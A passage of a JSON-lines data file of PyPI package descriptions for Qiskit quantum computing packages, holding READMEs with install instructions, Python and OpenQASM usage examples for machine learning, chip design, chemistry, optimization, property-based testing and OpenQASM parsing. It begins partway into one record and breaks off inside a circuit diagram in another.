accurately the test set can\nbe classified.fromqiskit.circuit.libraryimportTwoLocal,ZZFeatureMapfromqiskit_algorithms.optimizersimportCOBYLAfromqiskit_algorithms.utilsimportalgorithm_globalsfromqiskit_machine_learning.algorithmsimportVQCfromqiskit_machine_learning.datasetsimportad_hoc_dataseed=1376algorithm_globals.random_seed=seed# Use ad hoc data set for training and test datafeature_dim=2# dimension of each data pointtraining_size=20test_size=10# training features, training labels, test features, test labels as np.ndarray,# one hot encoding for labelstraining_features,training_labels,test_features,test_labels=ad_hoc_data(training_size=training_size,test_size=test_size,n=feature_dim,gap=0.3)feature_map=ZZFeatureMap(feature_dimension=feature_dim,reps=2,entanglement=\"linear\")ansatz=TwoLocal(feature_map.num_qubits,[\"ry\",\"rz\"],\"cz\",reps=3)vqc=VQC(feature_map=feature_map,ansatz=ansatz,optimizer=COBYLA(maxiter=100),)vqc.fit(training_features,training_labels)score=vqc.score(test_features,test_labels)print(f\"Testing accuracy:{score:0.2f}\")Further examplesLearning path notebooks may be found in theMachine Learning tutorialssection\nof the documentation and are a great place to start.Another good place to learn the fundamentals of quantum machine learning is theQuantum Machine Learningcourse\non the Qiskit Textbook's website. The course is very convenient for beginners who are eager to learn\nquantum machine learning from scratch, as well as understand the background and theory behind algorithms in\nQiskit Machine Learning. The course covers a variety of topics to build understanding of parameterized\ncircuits, data encoding, variational algorithms etc., and in the end the ultimate goal of machine\nlearning - how to build and train quantum ML models for supervised and unsupervised learning.\nThe textbook course is complementary to the tutorials of this module, where the tutorials focus\non actual Qiskit Machine Learning algorithms, the course more explains and details underlying fundamentals\nof quantum machine learning.Contribution GuidelinesIf you'd like to contribute to Qiskit, please take a look at ourcontribution guidelines.\nThis project adheres to Qiskit'scode of conduct.\nBy participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. Pleasejoin the Qiskit Slack communityand for discussion and simple questions.\nFor questions that are more suited for a forum, we use theQiskittag inStack Overflow.Authors and CitationMachine Learning was inspired, authored and brought about by the collective work of a team of researchers.\nMachine Learning continues to grow with the help and work ofmany people, who contribute\nto the project at different levels.\nIf you use Qiskit, please cite as per the providedBibTeX file.LicenseThis project uses theApache License 2.0."} +{"package": "qiskit-metal", "pacakge-description": "Qiskit MetalQiskit Metal is an open-source framework for engineers and scientists to design superconducting quantum devices with ease.InstallationIf you are interested in customizing your experience, or if you are unable to install qiskit-metal using thepip installinstructions below, consider installing directly the source code, following the instructions in thedocumentationand/or theinstallation instructions for developers.For normal use, please continue reading.The Qiskit Metal deployed packageYou can install Qiskit Metal via the pip tool (a python package manager).pipinstallqiskit-metalPIP will handle most of the dependencies automatically and you will always install the latest (and well-tested) version of the package.Some of the dependencies, namely pyside2 and geopandas, might require manual installation, depending on your specific system compatibility. If you encounter installation or execution errors, please refer first to theFAQ.We recommend to install qiskit-metal in a conda environment or venv, to prevent version conflicts with pre-existing package versions.Jupyter NotebookAt this time, we recommend using Jupyter notebook/lab to be able to access all the Qiskit Metal features. Jupyter is not installed with the default dependencies, to accommodate those users intending to utilize a centralized or customized installation.If you require a fresh installation, please refer to eitheranaconda.orgorjupyter.org.Unless you installed the entirejupyterpackage in your current environment, do not forget to create the appropriate kernel to make the environment (thus qiskit-metal) available to jupyter (instructions in theFAQ)Creating Your First Quantum Component in Qiskit Metal:Now that Qiskit Metal is installed, it's time to begin working with it.\nWe are ready to try out a quantum chip example, which is simulated locally using\nthe Qiskit MetalGUI element. This is a simple example that makes a qubit.$ python>>>fromqiskit_metalimportdesigns,draw,MetalGUI,Dict,open_docs>>>design=designs.DesignPlanar()>>>design.overwrite_enabled=True>>>design.chips.main>>>design.chips.main.size.size_x='11mm'>>>design.chips.main.size.size_y='9mm'>>>gui=MetalGUI(design)Launch the Qiskit Metal GUI to interactively view, edit, and simulate a QDesign:>>>gui=MetalGUI(design)Let's create a new qubit (a transmon) by creating an object of this class.>>>fromqiskit_metal.qlibrary.qubits.transmon_pocketimportTransmonPocket>>>q1=TransmonPocket(design,'Q1',options=dict(connection_pads=dict(a=dict())))>>>gui.rebuild()>>>gui.edit_component('Q1')>>>gui.autoscale()Change options.>>>q1.options.pos_x='0.5 mm'>>>q1.options.pos_y='0.25 mm'>>>q1.options.pad_height='90um'>>>q1.options.pad_width='455um'>>>q1.options.pad_gap='30 um'Update the component geometry after changing the options.>>>gui.rebuild()Get a list of all the qcomponents in QDesign and then zoom on them.>>>all_component_names=design.components.keys()>>>gui.zoom_on_components(all_component_names)Closing the Qiskit Metal GUI.>>>gui.main_window.close()A script is availablehere, where we also show the overview of Qiskit Metal.Community and SupportWatch the recorded tutorialsThe streaming will also be recorded and made availableherefor offline review.Take part in the live tutorials and discussionThrough June 2021 we are offering live tutorials and Q&A.Sign upto receive an invite to the upcoming sessions. The streaming will also be recorded and made available for offline review. Findheremore details on schedule and use the Slack channel to give us feedback and to request the most relevant content to you.Get help: SlackUse the slack channel. Joinqiskit slackand then join the#metalchannel to communicate with the developers and other participants. You may also use this channel to inquire about collaborations.Contribution GuidelinesIf you'd like to contribute to Qiskit Metal, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct. By participating, you are expected to uphold this code.\nWe useGitHub issuesfor tracking requests and bugs. Pleasejoin the Qiskit Slack communityand use ourQiskit Slack channelfor discussion and simple questions.\nFor questions that are more suited for a forum we use the Qiskit tag in theStack Exchange.Next StepsNow you're set up and ready to check out some of the other examples from ourQiskit Metal Tutorialsrepository orQiskit Metal Documentation.Authors and CitationQiskit Metal is the work ofmany peoplewho contribute to the project at different levels. Metal was conceived and developed byZlatko Minevat IBM; then co-led with Thomas McConkey. If you use Qiskit Metal, please cite as per the includedBibTeX file. For icon attributions, seehere.Changelog and Release NotesThe changelog provides a quick overview of notable changes for a given release.The changelog for a particular release can be found in the correspondent Github release page. For example, you can find the changelog for the0.0.4releasehereThe changelog for all releases can be found in the release page:Additionally, as part of each release detailed release notes are written to document in detail what has changed as part of a release. This includes any documentation on potential breaking changes on upgrade and new features.LicenseApache License 2.0"} +{"package": "qiskit-nature", "pacakge-description": "Qiskit NatureQiskit Natureis an open-source framework which supports solving quantum mechanical natural\nscience problems using quantum computing algorithms. This includes finding ground and excited\nstates of electronic and vibrational structure problems, measuring the dipole moments of molecular\nsystems, solving the Ising and Fermi-Hubbard models on lattices, and much more.The code comprises various modules revolving around:data loading from chemistry drivers or file formatssecond-quantized operator construction and manipulationtranslating from the second-quantized to the qubit spacea quantum circuit library of natural science targeted ansatzenatural science specific algorithms and utilities to make the use of\nalgorithms fromQiskit Algorithmseasierand much moreInstallationWe encourage installing Qiskit Nature via the pip tool (a python package manager).pipinstallqiskit-naturepipwill handle all dependencies automatically and you will always install the latest\n(and well-tested) version.If you want to work on the very latest work-in-progress versions, either to try features ahead of\ntheir official release or if you want to contribute to Qiskit Nature, then you can install from source.\nTo do this follow the instructions in thedocumentation.Optional InstallsTo run chemistry experiments using Qiskit Nature, it is recommended that you install\na classical computation chemistry software program/library interfaced by Qiskit.\nSeveral, as listed below, are supported, and while logic to interface these programs is supplied by\nQiskit Nature via the above pip installation, the dependent programs/libraries themselves need\nto be installed separately.Gaussian 16\u2122, a commercial chemistry programPSI4, a chemistry program that exposes a Python interface allowing for accessing internal objectsPySCF, an open-source Python chemistry programThe above codes can be used in a very limited fashion through Qiskit Nature.\nWhile this is useful for getting started and testing purposes, a better experience can be had in the reversed order of responsibility.\nThat is, in a setup where the classical code runs the Qiskit Nature components.\nSuch an integration currently exists for the following packages:PySCF viaqiskit-nature-pyscfIf you are interested in using Psi4, we are actively looking for help to get started on a similar integration inqiskit-nature-psi4.Additionally, you may find the following optional dependencies useful:sparse, a library for sparse multi-dimensional arrays. When installed, Qiskit Nature can leverage this to reduce the memory requirements of your calculations.opt_einsum, a tensor contraction order optimizer fornp.einsum.Creating Your First Chemistry Programming Experiment in QiskitCheck ourgetting started pagefor a first example on how to use Qiskit Nature.Further examplesLearning path notebooks may be found in theNature Tutorialssection\nof the documentation and are a great place to start.Contribution GuidelinesIf you'd like to contribute to Qiskit, please take a look at ourcontribution guidelines.\nThis project adheres to Qiskit'scode of conduct.\nBy participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. Pleasejoin the Qiskit Slack communityfor discussion and simple questions.\nFor questions that are more suited for a forum, we use theQiskittag inStack Overflow.Authors and CitationQiskit Nature was inspired, authored and brought about by the collective work of a team of researchers.\nQiskit Nature continues to grow with the help and work ofmany people, who contribute\nto the project at different levels.\nIf you use Qiskit Nature, please cite the following references:Qiskit, as per the providedBibTeX file.Qiskit Nature, as perhttps://doi.org/10.5281/zenodo.7828767LicenseThis project uses theApache License 2.0.However there is some code that is included under other licensing as follows:TheGaussian 16 driverinqiskit-naturecontainsworklicensed under theGaussian Open-Source Public License."} +{"package": "qiskit-nature-pyscf", "pacakge-description": "Qiskit Nature PySCFQiskit Nature PySCFis a third-party integration plugin of Qiskit Nature + PySCF.InstallationWe encourage installing Qiskit Nature PySCF via the pip tool (a python package manager).pipinstallqiskit-nature-pyscfpipwill handle all dependencies automatically and you will always install the latest\n(and well-tested) version. It will also install Qiskit Nature if needed.If you want to work on the very latest work-in-progress versions, either to try features ahead of\ntheir official release or if you want to contribute to Qiskit Nature PySCF, then you can install from source.UsageThis plugin couples the APIs of PySCF and Qiskit Nature, enabling a user of PySCF to leverage\nQuantum-based algorithms implemented in Qiskit to be used in-place of their classical counterparts.Active Space CalculationsOne very common approach is to use a Quantum algorithm to find the ground state in an active space\ncalculation. To this extent, this plugin provides theQiskitSolverclass, which you can inject\ndirectly into yourCASCIorCASSCFsimulation objects of PySCF.Below we show a simple example of how to do this.frompyscfimportgto,scf,mcscfimportnumpyasnpfromqiskit.primitivesimportEstimatorfromqiskit_algorithmsimportVQEfromqiskit_algorithms.optimizersimportSLSQPfromqiskit_nature.second_q.algorithmsimportGroundStateEigensolverfromqiskit_nature.second_q.circuit.libraryimportHartreeFock,UCCSDfromqiskit_nature.second_q.mappersimportParityMapperfromqiskit_nature_pyscfimportQiskitSolvermol=gto.M(atom=\"Li 0 0 0; H 0 0 1.6\",basis=\"sto-3g\")h_f=scf.RHF(mol).run()norb=2nalpha,nbeta=1,1nelec=nalpha+nbetacas=mcscf.CASCI(h_f,norb,nelec)mapper=ParityMapper(num_particles=(nalpha,nbeta))ansatz=UCCSD(norb,(nalpha,nbeta),mapper,initial_state=HartreeFock(norb,(nalpha,nbeta),mapper,),)vqe=VQE(Estimator(),ansatz,SLSQP())vqe.initial_point=np.zeros(ansatz.num_parameters)algorithm=GroundStateEigensolver(mapper,vqe)cas.fcisolver=QiskitSolver(algorithm)cas.run()More detailed information for this plugin can be found in itsDocumentation. For further\ninformation and explanations we recommend to check out the documentation ofPySCFandQiskit Nature.CitationIf you use this plugin, please cite the following references:PySCF, as perthese instructions.Qiskit, as per the providedBibTeX file.Qiskit Nature, as perhttps://doi.org/10.5281/zenodo.7828767"} +{"package": "qiskit-optimization", "pacakge-description": "Qiskit OptimizationQiskit Optimizationis an open-source framework that covers the whole range from high-level modeling of optimization\nproblems, with automatic conversion of problems to different required representations, to a suite\nof easy-to-use quantum optimization algorithms that are ready to run on classical simulators,\nas well as on real quantum devices via Qiskit.The Optimization module enables easy, efficient modeling of optimization problems usingdocplex.\nA uniform interface as well as automatic conversion between different problem representations\nallows users to solve problems using a large set of algorithms, from variational quantum algorithms,\nsuch as the Quantum Approximate Optimization Algorithm QAOA, to Grover Adaptive Search using the\nGroverOptimizer, leveraging fundamental algorithms provided byQiskit Algorithms. Furthermore, the modular design\nof the optimization module allows it to be easily extended and facilitates rapid development and\ntesting of new algorithms. Compatible classical optimizers are also provided for testing,\nvalidation, and benchmarking.InstallationWe encourage installing Qiskit Optimization via the pip tool (a python package manager).pipinstallqiskit-optimizationpipwill handle all dependencies automatically and you will always install the latest\n(and well-tested) version.If you want to work on the very latest work-in-progress versions, either to try features ahead of\ntheir official release or if you want to contribute to Optimization, then you can install from source.\nTo do this follow the instructions in thedocumentation.Optional InstallsIBM CPLEXmay be installed usingpip install 'qiskit-optimization[cplex]'to enable the reading ofLPfiles and the usage of\ntheCplexOptimizer, wrapper forcplex.Cplex. CPLEX is a separate package and its support of Python versions is independent of Qiskit Optimization, where this CPLEX command will have no effect if there is no compatible version of CPLEX available (yet).CVXPYmay be installed using the commandpip install 'qiskit-optimization[cvx]'.\nCVXPY being installed will enable the usage of the Goemans-Williamson algorithm as an optimizerGoemansWilliamsonOptimizer.Matplotlibmay be installed using the commandpip install 'qiskit-optimization[matplotlib]'.\nMatplotlib being installed will enable the usage of thedrawmethod in the graph optimization application classes.Gurobipymay be installed using the commandpip install 'qiskit-optimization[gurobi]'.\nGurobipy being installed will enable the usage of the GurobiOptimizer.Creating Your First Optimization Programming Experiment in QiskitNow that Qiskit Optimization is installed, it's time to begin working with the optimization module.\nLet's try an optimization experiment to compute the solution of aMax-Cut. The Max-Cut problem can be formulated as\nquadratic program, which can be solved using many several different algorithms in Qiskit.\nIn this example, the MinimumEigenOptimizer\nis employed in combination with the Quantum Approximate Optimization Algorithm (QAOA) as minimum\neigensolver routine.fromdocplex.mp.modelimportModelfromqiskit_optimization.algorithmsimportMinimumEigenOptimizerfromqiskit_optimization.translatorsimportfrom_docplex_mpfromqiskit.primitivesimportSamplerfromqiskit_algorithms.utilsimportalgorithm_globalsfromqiskit_algorithmsimportQAOAfromqiskit_algorithms.optimizersimportSPSA# Generate a graph of 4 nodesn=4edges=[(0,1,1.0),(0,2,1.0),(0,3,1.0),(1,2,1.0),(2,3,1.0)]# (node_i, node_j, weight)# Formulate the problem as a Docplex modelmodel=Model()# Create n binary variablesx=model.binary_var_list(n)# Define the objective function to be maximizedmodel.maximize(model.sum(w*x[i]*(1-x[j])+w*(1-x[i])*x[j]fori,j,winedges))# Fix node 0 to be 1 to break the symmetry of the max-cut solutionmodel.add(x[0]==1)# Convert the Docplex model into a `QuadraticProgram` objectproblem=from_docplex_mp(model)# Run quantum algorithm QAOA on qasm simulatorseed=1234algorithm_globals.random_seed=seedspsa=SPSA(maxiter=250)sampler=Sampler()qaoa=QAOA(sampler=sampler,optimizer=spsa,reps=5)algorithm=MinimumEigenOptimizer(qaoa)result=algorithm.solve(problem)print(result.prettyprint())# prints solution, x=[1, 0, 1, 0], the cost, fval=4Further examplesLearning path notebooks may be found in theoptimization tutorialssection\nof the documentation and are a great place to start.Contribution GuidelinesIf you'd like to contribute to Qiskit, please take a look at ourcontribution guidelines.\nThis project adheres to Qiskit'scode of conduct.\nBy participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. Pleasejoin the Qiskit Slack communityand for discussion and simple questions.\nFor questions that are more suited for a forum, we use theQiskittag inStack Overflow.Authors and CitationOptimization was inspired, authored and brought about by the collective work of a team of researchers.\nOptimization continues to grow with the help and work ofmany people, who contribute\nto the project at different levels.\nIf you use Qiskit, please cite as per the providedBibTeX file.LicenseThis project uses theApache License 2.0."} +{"package": "qiskit-pqcee-provider", "pacakge-description": "qiskit-pqcee-providerThe Qiskit provider for pQCee blockchain quantum simulatorInstallpip install qiskit-pqcee-providerUsageimportqiskitfromqiskit_pqcee_providerimportPqceeProviderprovider=PqceeProvider()backend=provider.get_backend('pqcee_simulator')qc=qiskit.QuantumCircuit(2)qc.h(0)qc.cx(0,1)qc.measure_all()job=backend.run(qc,shots=10)result=job.result()print(result.get_counts())"} +{"package": "qiskit-ptesting", "pacakge-description": "Qiskit-PTestingThis project aims to implement property-based testing for quantum circuits using the qiskit library for Python 3.6+.To learn more about qiskit, follow thislink.I also recommend followingtheir tutorials on quantum computing.To learn more about property-based testing in general, follow these ressources:Intro to property based testing,Wikipedia page.InstallationRunpip install qiskit-ptestingin a terminal environementIn any python file where you want to define property tests, add:fromQiskit_PTesting.Qiskit_PTestingimportQiskitPropertyTest,TestProperty,QargThat's it, you should be able to define tests in the same file.UsageCreate a superclass of \"QiskitPropertyTest\" using any name you wantIn that class, define 3 functions (optionally leave them out for default behaviour):property(self)quantumFunction(self, qc)assertions(self)Inside of the functionproperty(), define a TestProperty object and return itInside of the functionquantumFunction(), define which steps are needed to be applied to qc (the quantum circuit). All of the generated tests will have those operations applied.Inside of the functionassertion(), define which properties you would like to hold true using the built-in assertions.Run the test class you created using the \"runTests()\" method.How to define a TestPropertyA TestProperty object contains all of the necessary information to generate random tests.It contains:p_value: The p_value for all tests (float between 0 and 1)nbTests: The number of randomly generated tests (int greater than 0)nbTrials: The number of times each generated test will be run, otherwise called the amount of trials (int greater than 0)nbMeasurement: The number of times each trial will be measured (int greater than 0)nbQubits: The amount of required qubits for each test (int greater than 0, or a list of 2 integers, the 2nd one being greater of equal to the first)nbClassicalBits: The amount of classical bits required for each test(int greater or equal to 0)qargs: A dictionary of Qarg objects for each qubit that you want to initialise to a specific range/value (can be empty)backend: A string that expresses which backend should be used for the measurements.\nIt can be any backend from Aer or\"ibmq\", which automatically uses the API token stored on the computer.These are the default values:testProperty=TestProperty(p_value=0.01,nbTests=10,nbTrials=100,nbMeasurements=500,nbQubits=5,nbClassicalBits=0,qargs={},backend=\"aer_simulator\")NbQubits can be an integer or a list.\nIn that case, the framework will generate each test with a random amount of qubits between the two specified values.How to initalise a QargA Qarg object holds 4 ints that define 2 ranges.\nA test property will apply this Qarg to initialise a qubit to a random value between those 2 ranges.\nAny qubit of a quantum circuit can be initilised using 2 values: a theta and a phi.\nThe first range specifies what values theta can be used to initialise a qubit.\nThe second range specifies what values phi can take.Here is an example Qarg, that specifies that a qubit needs to be initialised with w theta between 0 and 90 degrees, and a phi of 40 to 60 degrees:qarg=Qarg(0,90,45,60)The same Qarg can be specified using radians, if the last paramter, isRad, is set to True:frommathimportpiqarg=Qarg(0,pi/2,pi/4,pi/3,True)A Qarg can also be specified with a statevector with two complex values in the following way:frommathimportsqrtqarg=Qarg([1/sqrt(2),1/sqrt(2)],[10,10],False)The above code initialises a qubit to the state |+>.\nThe second argument specifies that the theta can be up to 10 degrees higher or lower than the specified statevector, and same for the phi.\nThe False means that degrees are used instead of radians.Finally, some common states can be directly initialised with just one string:Qarg(\"0\") initialises to state 0Qarg(\"1\") to state 1Qarg(\"+\") to state +Qarg(\"-\") to state -Qarg(\"Any\") to any state on the Bloch sphereAssertions6 assertions are up to your disposition:Single-Qubit assertionsAssert the probability of a qubit to be in state |0>assertProbability(qu0,expectedProba,qu0_pre=False,basis=\"z\",filter_qc=None)assertNotProbability(qu0,expectedProba,qu0_pre=False,basis=\"z\",filter_qc=None)This assertion requires 2 arguments: first, the index of the qubit to be tested, and secondly the expected probability of measuring the qubit in the state |0> along the Z-axis.\nIt can also optionally take in an extra bool argument, that specifies whether the sampling will occur before the quantumFunction is applied.\nIt defaults to False, so the sampling occurs after the function.Assert that a qubit is in a given stateassertState(qu0,theta,phi,isRadian=False,qu0_pre=False,filter_qc=None)assertNotState(qu0,theta,phi,isRadian=False,qu0_pre=False,filter_qc=None)Assert that a qubit has teleported into anotherassertTeleported(sent,received,basis=\"z\",filter_qc=None)assertNotTeleported(sent,received,basis=\"z\",filter_qc=None)This assertion requires 2 positional arguments: a sent and a received qubit.\nIt evaluates whether quantum teleportation has occured between the qubits.Multi-Qubit AssertionsAssert the equality or inequality of qubits:assertEqual(qu0,qu1,qu0_pre=False,qu1_pre=False,basis=\"z\",filter_qc=None)assertNotEqual(qu0,qu1,qu0_pre=False,qu1_pre=False,basis=\"z\",filter_qc=None)This assertion requires 2 arguments, which are the indexes of the qubits to be tested, and 2 optional arguments that specify whether the qubits are to be tested before the quantumFunction() is applied.\nIt defaults to False, so if no arguments are specified there, it will compare the qubits after the function is applied.\nThis assertion tests whether the probabilities of measuring two qubits in the states |0> or |1> are the same.\nThe tests are done on the Z-axis.Assert that two qubits are entangledassertEntangled(qu0,qu1,basis=\"z\",filter_qc=None)assertNotEntangled(qu0,qu1,basis=\"z\",filter_qc=None)This assertion requires 2 positional arguments which are the indexes of qubits.\nThis assertion evaluates whether those two input qubits are entangled.Assert The Most Common Output(s) Of The CircuitassertMostCommon(output,filter_qc=None)This assertion takes in one required positional argument: a string or a list of strings showing the most common states of a circuitFeaturesMeasure qubit values before the quantum algorithmBy specifying the boolean parameters \"qu0_pre\" or \"qu1_pre\" to be True, it is possbile to tell the framework to measure the specified qubit values before or after running the quantum function\nThis is useful in many cases, for example ensuring that a qubit has changed values, or that a qubit is in the same state as another, etc...An example of using this would be:classexample(QiskitPropertyTest):defproperty(self):returnTestProperty(nbQubits=2,qargs={0:Qarg(\"0\"),1:Qarg(\"+\")})defquantumFunction(self,qc):qc.h(0)defassertions(self):#compares the qubits after the quantumFunction is runself.assertEqual(0,1)#compares both qubits beforeself.assertNotEqual(0,1,qu0_pre=True,qu1_pre=True)#compares qubit 0 after quantumFunction to qubit 1 beforeself.assertEqual(0,1,qu0_pre=False,qu1_pre=True)Filter generated testsIt is possible to apply a certain assertion to only the generated tests that have a certain attribute.\nThat attribute can be ANY function that returns a boolean and that takes a QuantumCircuit as input.\nThis feature can give a lot of depth to the defined tests, and enables the users to give very general properties about the input program.Here is an example of a use case of this feature: enabling properties on tests of any length:fromQiskit_PTesting.Qiskit_PTestingimportQiskitPropertyTest,TestProperty,Qargmin,max=(2,10)classexample(QiskitPropertyTest):defproperty(self):returnTestProperty(nbQubits=[min,max])defquantumFunction(self,qc):forindexinrange(len(qc.qubits):qc.h(index)defassertions(self):#specifies that all the qubits should be equal to each otherforindexinrange(max):self.assertEqual(0,index,filter_qc=lamdaqc:len(qc.qubits)>index)example().run()Change The Backend Used For The MeasurementsAer SimulatorsThe default simulator isaer_simulator, but all Aer simulators are available to choose.\nSimply pass downbackend=\"\"replacing the string with your chosen backend.Run Tests On Quantum ComputersIn order to run the code on quantum comupters, you have to create an IBMQ account, and specify in the testPropertybackend=\"ibmq\"Create an account withIBMQand loginCopy the API key found in the settings panel of the \"My Account\" section of the websiteRun the following python code:fromqiskitimportIBMQIBMQ.save_account(\"\")ExamplesfromQiskit_PTesting.Qiskit_PTestingimportQiskitPropertyTest,TestProperty,Qargclassexample(QiskitPropertyTest):defproperty(self):returnTestProperty(nbQubits=2,qargs={0:Qarg(\"0\"),1:Qarg(\"+\")})defquantumFunction(self,qc):qc.h(0)defassertions(self):self.assertEqual(0,1)example().run()Inner-workings of the frameworkThere are 4 main parts in this project:Test case generatorTest execution engineStatistical analysis engineProgramming interface"} +{"package": "qiskit-qasm2", "pacakge-description": "Importer from OpenQASM 2 to QiskitThis repository provides the Python packageqiskit_qasm2, which provides a\nfast parser of OpenQASM 2 into Qiskit'sQuantumCircuit. It is often 10x or\nmore faster than Qiskit's native parser. The API is simple:qiskit_qasm2.loadtakes a filename, and returnsQuantumCircuit;qiskit_qasm2.loadstakes an OpenQASM 2 program in a string, and returnsQuantumCircuit.The full documentation is published tohttps://jakelishman.github.io/qiskit-qasm2.A simple parsing example:importqiskit_qasm2program=\"\"\"OPENQASM 2.0;include \"qelib1.inc\";qreg q[2];creg c[2];h q[0];cx q[0], q[1];measure q -> c;\"\"\"qiskit_qasm2.loads(program).draw()\u250c\u2500\u2500\u2500\u2510 \u250c\u2500\u2510\nq_0: \u2524 H \u251c\u2500\u2500\u25a0\u2500\u2500\u2524M\u251c\u2500\u2500\u2500\n \u2514\u2500\u2500\u2500\u2518\u250c\u2500\u2534\u2500\u2510\u2514\u2565\u2518\u250c\u2500\u2510\nq_1: \u2500\u2500\u2500\u2500\u2500\u2524 X \u251c\u2500\u256b\u2500\u2524M\u251c\n \u2514\u2500\u2500\u2500\u2518 \u2551 \u2514\u2565\u2518\nc: 2/\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2569\u2550\u2550\u2569\u2550\n 0 1FeaturesThe parser supports all ofthe OpenQASM 2\nspecification,\nincluding:register definitions and usage (qregandcreg);theqelib1.incas a special builtin include, precisely as described in the\npaper;general includes, with an option to specify the search path;customgateandopaquedeclarations;gate, measurement and reset broadcasting;conditioned gate applications, measurements and reset;constant folding with the scientific calculator functions in gate parameter\nlists;mathematical expressions on parameters within custom gate bodies.In addition, the parser also includes options to:modify the search path forincludestatements in OpenQASM 2;define overrides for how some named OpenQASM 2 gate applications should be\nconverted into Qiskit form;define new builtin quantum instructions for OpenQASM 2;define new builtin classical scientific-calculator functions.Qiskit's builtin parser makes some extra-spec additions by default, with no\noption to disable them. This mostly takes the form of custom gate overrides,\nand various additional gates in Terra's vendored version ofqelib1.inccompared to the description in the paper. This parser is more type-safe than\nQiskit's, but does includea compatibility modeto ease the transition from using Qiskit's parser.InstallationInstall the latest release of theqiskit_qasm2package from pip:pipinstallqiskit_qasm2DevelopingIf you're looking to contribute to this project, please first readour contributing guidelines.Set up your development environment by installing the development requirements\nwith pip:pipinstall-rrequirements-dev.txttoxThis installs a few more packages than the dependencies of the package at\nruntime, because there are some tools we use for testing also included, such astoxandpytest.You will also need a working Rust toolchain. The easiest way to install one isby using rustupon Linux, macOS or Windows.After the development requirements are installed, you can install an editable\nversion of the package withpipinstall-e.After this, any changes you make to the library code will immediately be present\nwhen you open a new Python interpreter session.This package was mostly an excuse for me to learn a bit more about how lexers\nare written at a low level. This is why the Rust crate doesn't use any\nlexer-generation libraries. You can read a bit more about the architecture and\nsome of the design decisions inthe developer section of the\ndocumentation.Building documentationAfter the development requirements have been installed, the commandtox-edocswill build the HTML documentation, and place it indocs/_build/html. The\ndocumentation state of themainbranch of this repository is published tohttps://jakelishman.github.io/qiskit-qasm2.Code style and lintingThe Python components of this repository are formatted usingblack, and the\nRust components withrustfmt. You can run these on the required files by\nrunningtox-estyleThe full lint suite can be run withtox-elintLicenseThis project is licensed underversion 2.0 of the Apache License."} +{"package": "qiskit-qasm3-import", "pacakge-description": "Importer from OpenQASM 3 to QiskitThis repository provides the Python packageqiskit_qasm3_import, which is a\nbasic and temporary importer from OpenQASM 3 into Qiskit'sQuantumCircuit.Qiskit itself accepts this package as an optional dependency if it is installed.\nIn that case, Qiskit exposes the functionsqiskit.qasm3.loadandqiskit.qasm3.loads, which are wrappers aroundqiskit_qasm3_import.parse.\nThis project is a stop-gap measure until various technical decisions can be\nresolved the correct way; Terra makes strong guarantees of stability and support\nin its interfaces, and we are not yet ready to make that commitment for this\nproject, hence the minimal wrappers.ExampleThe principal entry point to the package is the top-levelparsefunction,\nwhich accepts a string containing a complete OpenQASM 3 programme. This complex\nexample shows a lot of the capabilities of the importer.OPENQASM 3.0;\n// The 'stdgates.inc' include is supported, and the gates are only available\n// if it has correctly been included.\ninclude \"stdgates.inc\";\n\n// Parametrised inputs are supported.\ninput float[64] a;\n\nqubit[3] q;\nbit[2] mid;\nbit[3] out;\n\n// Aliasing and re-aliasing are supported.\nlet aliased = q[0:1];\n\n// Parametrised gates that make use of the stdlib.\ngate my_gate(a) c, t {\n gphase(a / 2);\n ry(a) c;\n cx c, t;\n}\n\n// Gate modifiers work as well; this gate is equivalent to `p(-a) c;`.\ngate my_phase(a) c {\n ctrl @ inv @ gphase(a) c;\n}\n\n// We handle mathematical expressions on gate creation and complex indexing\n// of temporary collections.\nmy_gate(a * 2) aliased[0], q[{1, 2}][0];\nmeasure q[0] -> mid[0];\nmeasure q[1] -> mid[1];\n\nwhile (mid == \"00\") {\n reset q[0];\n reset q[1];\n my_gate(a) q[0], q[1];\n // We support the builtin mathematical symbols.\n my_phase(a - pi/2) q[1];\n mid[0] = measure q[0];\n mid[1] = measure q[1];\n}\n\n// The condition resolver can also handle simple cases that don't look\n// _exactly_ like equality conditions.\nif (mid[0]) {\n // There is limited support for aliasing within nested scopes.\n let inner_alias = q[{0, 1}];\n reset inner_alias;\n}\n\nout = measure q;Assuming this program is stored as a string in a variableprogram, we then\nimport it into aQuantumCircuitby doing:fromqiskit_qasm3_importimportparsecircuit=parse(program)circuitis now a completeQuantumCircuit, so we can see exactly what it\nturned into:circuit.draw()\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\u250c\u2500\u2510 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\u250c\u2500\u2510\n q_0: \u25240 \u251c\u2524M\u251c\u2500\u2500\u2500\u25240 \u251c\u25240 \u251c\u2524M\u251c\u2500\u2500\u2500\n \u2502 my_gate(2*a) \u2502\u2514\u2565\u2518\u250c\u2500\u2510\u2502 \u2502\u2502 \u2502\u2514\u2565\u2518\u250c\u2500\u2510\n q_1: \u25241 \u251c\u2500\u256b\u2500\u2524M\u251c\u25241 \u251c\u25241 \u251c\u2500\u256b\u2500\u2524M\u251c\n \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2551 \u2514\u2565\u2518\u2502 \u2502\u2502 If_else \u2502 \u2551 \u2514\u2565\u2518\n q_2: \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524M\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256b\u2500\u2500\u256b\u2500\u2524 While_loop \u251c\u2524 \u251c\u2500\u256b\u2500\u2500\u256b\u2500\n \u2514\u2565\u2518 \u2551 \u2551 \u2502 \u2502\u2502 \u2502 \u2551 \u2551\nmid_0: \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256c\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2569\u2550\u2550\u256c\u2550\u25611 \u255e\u25610 \u255e\u2550\u256c\u2550\u2550\u256c\u2550\n \u2551 \u2551 \u2502 